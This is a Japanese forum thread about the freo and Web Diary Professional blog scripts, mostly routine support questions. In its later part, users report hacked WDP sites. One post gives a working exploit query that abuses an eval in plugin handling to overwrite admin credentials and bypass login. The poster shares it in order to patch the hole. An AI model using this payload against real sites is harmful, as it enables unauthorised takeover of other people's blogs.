【freo】Web Liberty総合2【Web Diary Pro】

1Trackback(774)
垢版 |
2011/05/31(火) 08:40:40.65ID:/1e7LxBz
ブログ機能を備えたイラストサイト向け日記帳
freo、Web Diary Professional 他Web Libertyのスクリプトスレです。

Web Liberty
ttp://www.web-liberty.net/

Web Diary Professional配布元
ttp://www.web-liberty.net/download/diarypro/index.html
サポート掲示板(freo以外のWeb Libertyのスクリプト用)
ttp://www.web-liberty.net/support/index.html

freo配布元
ttp://freo.jp/
freo設置に関するサーバー別トラブルシューティング
ttp://freo.jp/setup/trouble/index.html
freoサポート掲示板
ttp://freo.jp/support/

前スレ
【freo】Web Liberty総合【Web Diary Pro】
http://hibari.2ch.net/test/read.cgi/blog/1290154285/
2013/01/17(木) 13:33:43.97ID:lIl9ywcR
メッセージ登録プラグインが
拍手プラグインみたいにフォーム増やせればいいのに…
2013/01/17(木) 17:18:58.54ID:t+u0Gas3
>>533
ありがとう
536Trackback(774)
垢版 |
2013/01/26(土) 14:45:34.66ID:0bMV2+KK
freoのスレあったんだ…
ここ読んだだけで知りたかった事が二つほど解決した。
公式で聞く程でもない気がして迷ってたけど助かったわーありがと。
537Trackback(774)
垢版 |
2013/01/26(土) 19:26:14.46ID:0bMV2+KK
ページアーカイブプラグインで、
特定ID以下のページだけ対象にする事って出来るよね…?
テンプレート編集で、月単位アーカイブを年単位にするのは出来たんだけど
ID指定の書き方がわからない…
2013/01/27(日) 11:34:25.77ID:+iqDX0dO
< 2 3 4 ... >こういうページ移動が
標準搭載だったらいいのになあ
2013/01/30(水) 14:39:17.11ID:+wedZBze
freoのtiny_mceでリスト表示にするときに<span style="line-height: 2;">が挿入されるようになったんだがなにが原因だろうか
ちなみに読み込ませている外部cssのpにはline-height: 2;が記述されているんだがこれが原因なのかな(以前はこれがあっても問題なかった)
2013/03/04(月) 14:54:40.97ID:GDjDfaj7
凄い初歩的な質問で申し訳ないんだが…
freoのリンクはどうやって増やしたりすれば良いんだろう
設置したは良いものの、管理ページのどこを見てもリンクを弄れそうな箇所が見つからない
サイト確認ではちゃんとリンクの項目もあるんだが…orz
誰か教えてくれたら助かります
2013/03/04(月) 15:28:14.28ID:lj1/7B+e
templates>utility.htmlを検索してみ
2013/03/19(火) 01:37:49.62ID:n96SD1Zr
ここってWeb Gallery Professionalの質問をしても大丈夫ですか?
2013/03/20(水) 22:23:24.67ID:63fLPfbv
大丈夫だよ
質問スレじゃないのと、最近過疎ってて使ってる人が少ないから
レスがつきにくいかもしれないけど
2013/03/20(水) 22:40:10.37ID:byj6wGxE
ありがとうございます。その言葉が嬉しいです

それであのさっそく本題なのですが、この間から「Web Gallery Pro」を使い初めました
環境設定>ログの表示設定>作品一覧での表示順>登録日時の昇順 で一覧ページでは昇順になるのですが、
個別ページに複数枚入れて一括表示にしていると、登録順と逆に表示されるのは仕様なのでしょうか?

例:サムネ 1.jpg 2.jpg 3.jpg と登録すると 3.jpg 2.jpg 1.jpg と表示されます

一応公式の過去ログもあさったのですが、作品一覧ページの話で個別ページでそういう風になっているという話もなく、
方法として最新をDLしたら機能する、という話だったので自分とは違うかなと思いました(一応入れ直し、ページの作り直しもしてみました)
2013/03/23(土) 23:25:55.73ID:fE4TRWHp
Web Diary Professionalを設置したんだけど、スマホからブラウザで
管理者ページへ行って新規投稿したら文字化けするんだけど
これは仕方が無いんでしょうか?
スマホから投稿出きると便利だし、
メモ代わりの記事が文字化けしちゃったから、直せるものなら
記事を削除せずに直したいです・・・
2013/03/27(水) 23:43:46.67ID:06y7Ucq7
スマホ使ってないからしらんけど、
文字化けの原因はブラウザ側が文字コードを間違って認識してるから。
スマホ側で正しい文字コードを指示してやるか、
ブログ側の文字コードを修正してやることに。
547Trackback(774)
垢版 |
2013/03/29(金) 13:44:48.55ID:FG+aXvWU
記事内にテキストリンクを貼る場合なんだけど
<a href="http://○○○.com">テキスト</a> で外部へのリンクは貼ることはできました
でも内部の他の記事へのリンクを貼ったら反映されなかったんだけど、だれか教えてくらはい
2013/03/30(土) 00:16:50.06ID:d8ozwFyD
<a href="内部の他の記事へのURL">テキスト</a>
2013/04/13(土) 16:58:37.05ID:sQWzTfRi
>>547 こんなのみつけたけど関係あるかな?
>最終ページに他ページヘのリンクを設置したい…という意味でしたら、リンクに「rel="external"」を付けておいてください。
><a href="http://www.example.com/"; rel="external">◯◯</a>
550Trackback(774)
垢版 |
2013/04/13(土) 22:09:32.21ID:s19WV5Sp
>>548 >>549
ありがとう。新しい記事をアップしたら直りました
なぜ反映されなかったのかは不明
551Trackback(774)
垢版 |
2013/04/19(金) 17:55:49.87ID:sy8KRg33
増やせるメールフォームのプラグインきたね
2013/04/21(日) 02:09:14.09ID:opvKH9y7
商売するわけでもないから増えてもしょうがない。
返信すらする気ない俺には要件を伝える入力フォームだけでいい。
553Trackback(774)
垢版 |
2013/04/25(木) 19:36:20.10ID:NqAoaqJB
552感じ悪いなー
自分は実用的なメールフォーム切望してたから、有り難く使わせてもらうよ。
しかもかなり高機能。
あとIPアドレスがメールに入れば完璧かな…
Smartyで出来たっけ。
2013/04/25(木) 19:48:52.27ID:1nXRilht
必要ならフォームの中に書けばいいんだし、それで事足りるじゃろ。
感じ方は人それぞれだから、自分と違う意見があっても当たり前。
感じが悪いなんて人格攻撃するほうがよっぽど感じ悪いわw
2013/04/26(金) 00:16:30.10ID:zj2Gi9tk
感じ悪いとかじゃなしにどうでもいい無駄レスってだけだろ
そんなことお前のブログにでも書いとけよってやつ
2013/05/07(火) 02:39:50.95ID:9aQwgjc2
utility内にあるpageのリスト、
pageタイトルが表示されるけど、ここをオプションで設定した一行テキストがある場合、そのテキストを表示する事って可能ですか?

長いタイトルでも表示は簡潔なものにしたいのです。
2013/05/07(火) 16:59:08.28ID:acPcNd8I
オプションで設定した一行テキストがある場合、そのテキストを表示する
一行テキストオプションのIDは「sample」と仮定する

<h3>ページ</h3>
<div class="content">
<ul>
<!--{foreach from=$plugin_page_menus|smarty:nodefaults item='plugin_page_menu'}-->
<li><a href="{$freo.core.http_file}/page/{$plugin_page_menu.id}">
<!--{if $plugin_page_menu_associates[$plugin_page_menu.id].option.sample}-->
{$plugin_page_menu_associates[$plugin_page_menu.id].option.sample}
<!--{else}-->
{$plugin_page_menu.title}
<!--{/if}-->
</a></li>
<!--{foreachelse}-->
<li>ページが登録されていません。</li>
<!--{/foreach}-->
</ul>
</div>

ここのページメニューのオプション情報を個別に表示するを参考にした
ttp://32877.xii.jp/index.php/view/37
2013/05/07(火) 22:17:01.57ID:9aQwgjc2
>>557
556です。
ヒントだけでも頂ければと思い質問しましたが、しっかりと答えて頂きありがとうございます!
クレクレちゃんと思われるかもと気になりますが…

帰宅後、早速実行してみます。
また、参考になるサイトの紹介、助かります!
ありがとうございました。
2013/05/11(土) 00:31:01.84ID:jhtjKYpu
最近のfreoはレスポンシブでテンプレートが少ないのは嬉しいのですが、デザイン的に厳しい時もあります。
そこでiphoneテンプレートのようにpc表示ボタンを作ろうと思ってます。
今のところ、jqueryを使用し、css切替えでの実現を考えていますが、ほとんど変わらないcssを二つ管理する事になります。
良い方法があれば、お知恵をお貸し下さい。
2013/05/28(火) 02:29:00.73ID:yxs442uY
ダレカフレオノアイポンアプリツクッテクレナイカナー
2013/05/28(火) 15:10:05.77ID:qbNt513K
アプリにしてなにするんだよ、意味がわからん。
2013/06/04(火) 20:44:20.90ID:B94ej18j
Web Memoryを今の技術で作り直してくれたらいいな
2013/06/04(火) 21:46:32.09ID:r3wGUngB
管理画面のプラグイン一覧のページから、freo本家以外の
プラグイン作者さん家にリンクしてあればいいんだけどな
どこで借りたものか、久しぶり過ぎると忘れてる
プラグイン名称も曖昧なの多いしw
2013/06/05(水) 02:36:14.03ID:V6UrmbFg
>>562 ブックマーク登録プラグイン(だったと思う)を一行日記風に使ってる人みたよ
タグ機能もついてるし面白いなーと思った
2013/06/21(金) 00:32:40.19ID:e/NPRG7B
WebMemoryの設置に一年かかった
やっと使える
2013/06/21(金) 03:51:16.88ID:93Ov7IhH
い、いちねん?
2013/07/23(火) NY:AN:NY.ANID:Lr0VutGC
freoの最新版に漫画表示プラグインを入れたんだけど、設定が終わって画像も登録して
いざ挿入ボタンを押すとラジオボタンが初期状態に戻るだけで反応が無い…
バージョンが結構進んでたからこの辺でそろそろ一新しようと思ったけど躓いたw
2013/07/24(水) NY:AN:NY.ANID:/tPBB/68
Web Gallery Professionalの質問です

各分類のタイトルをHTMLファイルに書き出したページのみ
他のページと違うデザインにすることは可能ですか?

JSファイルに書き出した際のデザイン変更は
js_title.htmlやjs_text.htmlを変えれば出来ると分かったのですが
HTMLファイルに書き出したページのデザイン変更が
どのファイルをいじれば良いのかどうしても分かりません

もし分かる方がおられましたら教えて頂けないでしょうか
2013/07/29(月) NY:AN:NY.ANID:AIOFJyyr
568ですが自己解決しました!
失礼しました!
2013/08/04(日) NY:AN:NY.ANID:9fYtYSry
自己解決した報告のついでに解決策や勘違いしてた点を書けば後進に生かせるのに
2013/08/14(水) NY:AN:NY.ANID:bXU9W8BC
更新きたー
572Trackback(774)
垢版 |
2013/09/09(月) 18:29:38.65ID:g/2dgHmu
>>567
その後解決しましたか?
同じ症状が出てしまって困ってます
2013/09/14(土) 11:32:17.32ID:HnuLlY/1
WebDiary Proの質問です
慣れていないため、わかりにくい書き方になっていたらすみませn

これまでは普通に、
投稿記事を書く→投稿記事画面に表示される
という使い方しかしていませんでした

しかし、ある種の記事だけ、新着時に投稿記事画面に表示せず、
分類一覧からのみアクセスできるようにしたいのです
(具体的に書くと、分類名「業務連絡」の内容が投稿記事部分に毎回反映されると煩雑なので、
必要な人のみ分類一覧から読めるようにしたい)

どうすればいいのか、教えていただけないでしょうか
2013/09/16(月) 16:17:21.97ID:t80eTnQr
freoで新着ページ一覧で表示させてるところに親のページ名表示させる方法ってありませんか?
これができると整理がしやすくなるんですが
2013/09/16(月) 18:39:39.22ID:qt1q4Bvi
新着ページ一覧で親ページのIDは取れるけど親ページのタイトルとるのは難しいな
2013/09/19(木) 22:17:18.20ID:lkaAf7z3
>>575
やっぱりそうですか・・・代わりのやり方を探してみます、ありがとうございます
2013/09/20(金) 12:11:49.12ID:Cp1y1ChT
タグひとつで自動にってわけにはいかないけど、オプションで
手動入力するのがいいんでないかい
2013/09/28(土) 18:55:31.82ID:pIgeGOaE
投稿時間と投稿者名は直接いじるしかなく、管理メニューから設定出来ないのかな
消したい
2013/09/28(土) 23:48:06.62ID:YJC33uOf
テンプレいじれば?
2013/10/01(火) 08:24:05.74ID:7Iroiqky
俺もWDPやfreoの時間とかいらん部分はテンプレの該当部分消してる
管理ページでできればそりゃ楽だけどまあそれくらいは自分でやろうぜ
2013/10/03(木) 04:07:46.93ID:4LGa+39r
viwとentryとpageと3箇所変えなきゃいけないのは地味にめんどい
まあ1回変えちゃえばいいんだけどさ
2013/10/04(金) 00:29:15.86ID:INWmXRqR
管理画面で3箇所設定するのも手間でいったらそんなに変わんないだろ…
2013/10/04(金) 06:46:44.44ID:NKL0e6Lu
WDPからfreoにログ移行でフォントサイズやネタバレボタンが効かなくなってしまった
フォントサイズはWDPのCSSをコピペしたら戻った(ついでにmarkitup!でも文字サイズ指定ボタンを作った)
でもネタバレ内に書いた文字の表示がおかしいまま…
うまいことfreo用に書き直す事ができない;;
2013/10/20(日) 16:35:05.53ID:/ulOSur8
ここのWeb拍手CGIを使ってる方でスクロールバーの色を弄ってる方いますか?
IE8使いなんですがCSSを色々弄ってみてもhtmlページのスクロールバーの色だけ変更されません
Web拍手の中に設置しているテキストエリアのスクロールバーのほうは指定した色が適用されてて
もう何をどうしたらいいやらです
2013/10/21(月) 08:36:56.56ID:Acy0oVSe
IE捨てれば
2013/10/22(火) 01:20:59.74ID:kErtHknM
>584
それはDOCTYPE宣言/レンダリングモードの問題でCGIは関係ないと思う。
ページ全体のスクロールバーへの色指定は今やレガシーなので、
新し目のHTMLやブラウザではCSSによる指定を無効にするようになっている。
2013/11/26(火) 14:25:12.27ID:zTFEz6XL
質問です
freoでエントリー書く時のフォームの改行(shift+enter)が面倒だから、
公式に書いてあった方法とか、あとは<br>と<p>の入力反転とか試してみたんだけど、
前者はまったく利かないし(火狐とIEで試した)、後者はIEでしか利かなかった
なんとかしたいんだけどどうすればいいんだろう
2013/11/27(水) 11:33:10.59ID:dR8qmFRV
解決になってないけど、markitup!導入してタグ付与プラグイン使うとか
2013/11/27(水) 21:33:56.62ID:m0chZQok
>>588
レスありがとうございます
時間が出来たので試してみたんですが、
タグ付与プラグインということは、記事はコピペで書くこと前提になる感じですかね?
2013/11/28(木) 00:00:20.60ID:PTl9MP2p
>>589
それかテキストだけ先に打って「確認する」で改行タグつけさせてフォームに戻って
画像挿入したり装飾タグ入れるかんじになるかなー
shift+enterの方がラクだと思うw
2013/11/28(木) 00:11:23.36ID:aroaX2RG
>>590
やっぱりそうですよねー
でもshift+enterだと専ブラショトカ(書き込み)とごっちゃになって、
最近2chで誤爆しがちになってるのでどうにかしたかったんです
ブラウザダウングレードしてもだめだったんですけど、もうちょっとあがいてみます!
2013/11/28(木) 00:12:24.23ID:aroaX2RG
あああ、言ってる傍から誤爆しました

レスありがとうございました!
593593
垢版 |
2013/12/13(金) 10:36:27.05ID:gkJsmUoH
ここのコメントにある内容ですが、うちもやられてました
http://blog.nemoa.biz/2013/02/04/web-diary-professional%E3%81%AF%E4%BD%BF%E3%82%8F%E3%81%AA%E3%81%84%E6%96%B9%E3%81%8C%E3%81%84%E3%81%84%E3%81%8B%E3%82%82%E3%81%97%E3%82%8C%E3%81%AA%E3%81%84.html
中国からのIPですが、ブルートフォースアタックというよりは非常にスマートに
ファイルをアップロードして通販サイトへのphpページを作ってました
webdiaryを狙い撃ちしてるっぽいです
594593
垢版 |
2013/12/13(金) 10:37:45.38ID:gkJsmUoH
すみませんあげます

mode=adminのページから一発でファイルアップロードしてますので、
パスワードの複雑さなどはたぶん関係ないかと思います
2013/12/13(金) 18:41:28.20ID:HI6WBMjd
804 サイト sage 2013/12/13(金) 14:38:00.43 ID:4223FznmO
>>803
freo使用中なので気になって調べてみたら、作成者さんの回答ツイログ?を見つけた

ttp://refirio.org/twitter/?date=20130419 (13:41〜13:53間の記事)
freo使おうか考えている人やWeb Diary Pro使用中の人はこれも参考になるかも
2013/12/13(金) 23:34:26.60ID:jckAc2+g
Web Diary Proなんですが、スマホから画像を投稿すると、タイトルも本文も文字化けします…
文字だけの投稿なら大丈夫なんですが、何が原因なのか調べてみても見当がつきません
心当たりある方いらっしゃったらご教授下さい
2013/12/14(土) 20:12:11.16ID:1ZzuUUq1
>595
>freoを更新するたびに「freoが更新されたか。まあ、WordPressの方がいいけどね。」
>なことをTwitterに書いている人だったので、
www
2013/12/14(土) 21:13:38.39ID:/av2nDVe
>>593
同人板のあのスレは、freo専スレじゃないんで
ここでやりなよ

作者に詳細送って返事来たら晒して
自分のは不審なファイル何もなかったよ
2013/12/15(日) 22:33:05.43ID:jtkEI8RD
freoで過去ログを年単位にしたいんだけど、テンプレいじるだけじゃなんだろうか
年単位に直して使っている人いたら教えていただきたいです
600Trackback(774)
垢版 |
2013/12/20(金) 05:45:19.33ID:Da41Amxw
WebDiaryProで質問なのですが、ドメイン直下にインストールってどうやればいいんでしょうか。
特殊なサーバでの設置方法でやってみたんですけど、うまくいかないです…。
Software error:

Bad name after file' at lib/webliberty/App/Init.pm line 116.

Software error:

[Fri Dec 20 05:38:00 2013] Init.pm: Bad name after file' at lib/webliberty/App/Init.pm line 116.
Compilation failed in require at lib/webliberty/App.pm line 10.

Software error:

[Fri Dec 20 05:38:00 2013] Init.pm: [Fri Dec 20 05:38:00 2013] Init.pm: Bad name after file' at lib/webliberty/App/Init.pm line 116.
[Fri Dec 20 05:38:00 2013] Init.pm: Compilation failed in require at lib/webliberty/App.pm line 10.
BEGIN failed--compilation aborted at lib/webliberty/App.pm line 10.

Software error:

[Fri Dec 20 05:38:00 2013] App.pm: [Fri Dec 20 05:38:00 2013] Init.pm: [Fri Dec 20 05:38:00 2013] Init.pm: Bad name after file' at lib/webliberty/App/Init.pm line 116.
[Fri Dec 20 05:38:00 2013] App.pm: [Fri Dec 20 05:38:00 2013] Init.pm: Compilation failed in require at lib/webliberty/App.pm line 10.
[Fri Dec 20 05:38:00 2013] App.pm: BEGIN failed--compilation aborted at lib/webliberty/App.pm line 10.
Compilation failed in require at diary.cgi line 13.

Software error:

[Fri Dec 20 05:38:00 2013] App.pm: [Fri Dec 20 05:38:00 2013] App.pm: [Fri Dec 20 05:38:00 2013] Init.pm: [Fri Dec 20 05:38:00 2013] Init.pm: Bad name after file' at lib/webliberty/App/Init.pm line 116.
[Fri Dec 20 05:38:00 2013] App.pm: [Fri Dec 20 05:38:00 2013] App.pm: [Fri Dec 20 05:38:00 2013] Init.pm: Compilation failed in require at lib/webliberty/App.pm line 10.
[Fri Dec 20 05:38:00 2013] App.pm: [Fri Dec 20 05:38:00 2013] App.pm: BEGIN failed--compilation aborted at lib/webliberty/App.pm line 10.
[Fri Dec 20 05:38:00 2013] App.pm: Compilation failed in require at diary.cgi line 13.
BEGIN failed--compilation aborted at diary.cgi line 13.
2014/01/16(木) 22:04:49.75ID:qob4Yu0L
Web Libertyサイトが休止しとる
2014/01/18(土) 21:25:36.20ID:hyINR9qB
DL出来るようにしたまま休止には出来なかったのかな
掲示板のログとかまだ見ることあったんだけど…
freoにしろってことか
2014/01/22(水) 09:30:34.98ID:9jP5zmJq
うわ、DL出来なくなったこと今知った
Web Memoryのシンプルさが好きだから残念だ
freoだとちょっと機能が豪華すぎるんだよね
2014/01/22(水) 10:33:18.85ID:EByWucEN
放置してるバグもあるっておっしゃってたしな
2014/01/22(水) 11:03:51.50ID:o+ASz/rV
おっしゃってましたか
2014/01/23(木) 00:45:36.51ID:tfGFQU5l
freoでいっぱいいっぱいなんじゃないの

wikiできてたん知らんかった
607Trackback(774)
垢版 |
2014/01/23(木) 07:29:18.94ID:+B8S05hI
警察のサイバーからWDPは古いプログラムで
セキュリティに脆弱性あるから新しいのに換えよと
警告もらった。
確かに今年に入ってハッキングされたが。
お気に入りだけに困った。
2014/01/23(木) 14:51:35.47ID:OnLBxwLn
知り合いも警察から連絡いったって言ってた。
それで配布サイト閉じちゃったのか?
609Trackback(774)
垢版 |
2014/01/23(木) 15:02:29.27ID:SSbIZ5+H
質問です。
最近、こちらで作ったって思える、blogを引き継いだのですが、サポートも終わってて、ちんぷんかんぷんなもんで、誰か教えて下さい。

コメント欄が放置年数分スパムメールで埋まってましていて削除を行うと、 Read Error : ./data/paint/と表示されます。

また。編集画面から削除しょうとすると、削除キーを求められて削除出来ません。

誰か助けて下さい!
当方スマホで削除しょうとしましたが、パソコンからじゃないと駄目ですか?
2014/01/24(金) 19:35:20.24ID:nPB/dog9
>>607
警察ってそんなに世話やいてくれるの?
アオリでなく本気で不思議なんだが

まさか>>597みたいな人が偽メール送ってるとかじゃないよね
2014/01/24(金) 21:01:04.22ID:OvwcrJBc
脆弱性のあるプログラムを使ってるからってそんなメール来たことないけど
マジなの?
2014/01/24(金) 22:44:49.49ID:As2LzwGk
嘘に決まっとるがな
613Trackback(774)
垢版 |
2014/01/24(金) 22:56:00.97ID:Y8X9lR1D
残念ながら事実だ
一件、サブドメインでつかっているところにはドメインサイトの
管理・運用しているところからハッキングされているとの連絡を受け
もう一件はサイト企業の代表者に直接府警からそのような連絡が来た。

事業者登録しているので顧客に説明しに回っていたら
幸か不幸か10件のFreo に移行の仕事が入ってしまった。
2014/01/24(金) 23:50:12.32ID:P7Km9h6P
もし本当なら、何でどこも(上に出てたサイト以外)取り上げてないの?
もし本当なら、作者はなんで何も説明してないの?
2014/01/25(土) 00:09:55.55ID:Lu9mWw3s
警察庁サイバー犯罪対策のサイト見てきたんだが何の注意もないね
WDP使ってるサイトをいちいち調べて警告メール出すのってすごく大変だろうし
警察が把握してるのに配布サイトで何の説明もさせてないってのも気になる

ただ自分も使ってるから本当なら困る
サイバーに問い合わせてみようかな
2014/01/25(土) 01:01:52.31ID:au18iZ4J
前ツイッターか何かで言ってた粘着がうざくなったから公開停止したんじゃないの…
2014/01/25(土) 01:35:32.05ID:FO4M7rX3
つーか末端ユーザに警察から警告とかねーわ
618593
垢版 |
2014/01/25(土) 11:19:27.24ID:ZaJSS7Nq
メールしました
メンテできてなくて気になってたからこの機会に停止するだそうです
2014/01/25(土) 14:00:25.08ID:5oaxjuak
保証なし自己責任で再配布してくれないかなあ
ここのブログCGI一番使いやすいんだよね…
freoはもさっとしてて苦手
620593
垢版 |
2014/01/25(土) 17:17:27.93ID:ZaJSS7Nq
作者さんはあんまり修正する気がないみたいです
1週間以上返事がない

とりあえず自分で見つけてみた
621593
垢版 |
2014/01/25(土) 17:24:32.94ID:ZaJSS7Nq
やっとこさ再現出来た
プラグインの処理で、クエリをそのままevalしてるところがあって、そこを使えば突破できた

mode=admin&work=new&admin_user=1&admin_pwd=1&plugin=Sample;require webliberty::App::Admin;
${$self}{init}{data_user} %3d 'echo 1 11b0WGZJEBWiw admin|';
my $app_ins %3d new webliberty::App::Admin(${$self}{init}, ${$self}{config}, ${$self}{query});
$app_ins::run;
(途中改行してます)
GETの確認までで、実際のPOSTまでは進んでないが、理屈では通るはず

こんな感じで、最初っからSampleのプラグインが存在するのを利用して、evalルーチンにやりたいことを渡せばOK
admin_user以降のクエリを付加し続ければ、adminとしてその後なんでもできる

なんでevalでrequireなんてしてるのかというと、攻撃者はわざわざ新規記事投稿して、その際のファイルアップロードを利用してファイルを置いてたのよね
俺ならuser.logでも追記しちゃうけど、それをしないでどうみてもブラウザでちまちまファイルアップしてるのよ
アップ記事の確認までちゃんとしてる
それを再現するために、わざわざパスワードを完全無効化できるパラメータにした
evalの部分を見つけるのは早かったが、パスワード無効化のパラメータ作る方に苦労したw

ってか、中華がこんなことわざわざやるとも思えないし、もっと別の脆弱性があるんだと思う
誰か手伝ってもらえませんか?
穴を塞ぎたいので
622593
垢版 |
2014/01/25(土) 17:30:19.79ID:ZaJSS7Nq
あ、echoのところの
1と11b0WGZJEBWiwとadminの区切りはタブね
WDPは\tでsplitしてるので
623607
垢版 |
2014/01/25(土) 22:01:56.04ID:RKkYg/s2
593さん
私のクライアントも新規投稿で悪質なサイトへのさそいが2件、
dataフォルダーには
burberry
gucci
というフォルダーをつくられそのブランドの商品説明HTMLファイルを
おかれていました。
さらに
D3ck9h.php
seoworld.php
という怪しげなファイルが置かれていました。

WDPはクライアントにも大変使いやすいプログラムで
今後も使い続けたいと思っています。
私はプログラムにはちんぷんかんぷんですが
ないとさん、皆さんに期待しております。
2014/01/26(日) 02:42:18.79ID:9GGpymna
警察から警告来た人か
よかったらそのメール?か何か晒してくれ
625Trackback(774)
垢版 |
2014/01/26(日) 03:16:23.95ID:83tX4hE7
サイト企業の代表者へ電話でした。
2014/01/28(火) 02:35:06.09ID:huqAYFRd
どうにも信用しにくいな
>>614->>617あたりに同意
627593
垢版 |
2014/01/28(火) 09:08:59.23ID:ihcjvpF7
今回の輩はどうもSEO目的みたいですね
ファイルを置いてリンクを張るのが目的のよう
それ以外のことは特にしてこないからあんまり実害ない

私が分かったのはサーバのログに自分が置いてないファイルが出てたから
実は私と同時期にクライアントのサーバ会社も事態を把握したようだから、
変なアクセスは増えるんだろうけども。

あとはPOPサーバ情報なんかを入れてる人はそれは見られちゃうね
628593
垢版 |
2014/01/28(火) 09:22:29.67ID:ihcjvpF7
本当かどうか知りたい人は、diary.cgiのURLを記載したファイルを同一ドメイン上に
あげて、そのファイルのURLを張ってもらえれば、環境設定画面のスクリーンショットをUPできます
2014/01/31(金) 09:28:51.00ID:kUSqjVQo
ニッキーは復活したけど、自分で設置するイラストや写真を展示するのに
手軽なツールがどんどん減ってるなぁ
2014/01/31(金) 21:17:30.33ID:T5fUTTXj
今更何を、と思ったけどイベントが2巡するのは初めてだっけ
来週はバレンタイン来るかな?
2014/01/31(金) 21:53:42.19ID:T5fUTTXj
ごめん誤爆
2014/02/02(日) 22:42:21.55ID:6PhdtoXw
>>629
ほんこれ
2014/02/05(水) 18:42:40.10ID:iCwN5ioK
イラスト設置するのにどっかいいのないですかね?
634593
垢版 |
2014/02/06(木) 08:49:47.15ID:1iRU7+xc
さすがはgoogleさんで、このphpファイルを見つけると、クラッキングと判定するようです
WDP使ってるサイトで、ぐぐった際の結果に、「このサイトは第三者にハッキングされています」とか出てたら、
おそらくWDPが原因でしょう
レスを投稿する

5ちゃんねるの広告が気に入らない場合は、こちらをクリックしてください。

ニューススポーツなんでも実況